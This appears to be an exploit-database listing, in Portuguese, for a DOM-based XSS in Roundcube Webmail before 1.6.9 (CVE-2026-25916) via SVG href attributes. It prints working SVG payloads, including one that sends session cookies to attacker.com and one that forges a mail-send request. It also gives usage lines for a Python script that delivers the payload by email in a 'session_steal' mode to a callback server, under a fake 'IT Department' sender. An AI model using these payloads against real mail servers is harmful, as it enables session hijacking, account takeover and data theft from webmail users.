
Exploit em Python para XSS baseado em DOM no Roundcube Webmail (CVE-2026-25916) por meio de atributos href em SVG, permitindo sequestro de sessão e exfiltração de dados através de e-mails criados.
Título da Exploração: XSS DOM no Roundcube Webmail via href em SVG (CVE-2026-25916)
Autor: Mohammed Idrees Banyamer
Contato: GitHub @mbanyamer | Instagram @banyamer_security
País: Jordânia
Data: 9 de fevereiro de 2026
CVE: CVE-2026-25916
Tipo: Cross-Site Scripting (XSS) baseado em DOM
Plataforma: Aplicação Web
Testado em: Roundcube 1.6.8, Ubuntu 22.04
Pontuação CVSS: 6.1 (Média)
⚠️ AVISO: Esta exploração é apenas para fins educacionais e de testes autorizados.
Use somente em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.
O autor não é responsável por qualquer uso indevido ou atividades ilegais.
As versões do Roundcube Webmail anteriores à 1.6.9 contêm uma vulnerabilidade de XSS baseado em DOM no tratamento de SVG. A aplicação não sanitiza adequadamente os atributos e em elementos SVG, permitindo a execução de JavaScript por meio de e-mails especialmente elaborados.
hrefxlink:hrefVersões Afetadas: Roundcube Webmail < 1.6.9
Corrigido em: Versão 1.6.9 (Commit 26d7677)
CWE: CWE-79 - Neutralização inadequada de entrada durante a geração de páginas web
Vetor de Ataque: Remoto via e-mail
Impacto: Sequestro de Sessão, Assunção de Conta, Exfiltração de Dados
A vulnerabilidade existe em rcube_washtml.php, onde os atributos href em elementos SVG não eram validados adequadamente:
<!-- Elementos SVG vulneráveis -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u [email protected] \
-w app_password \
-r [email protected] \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"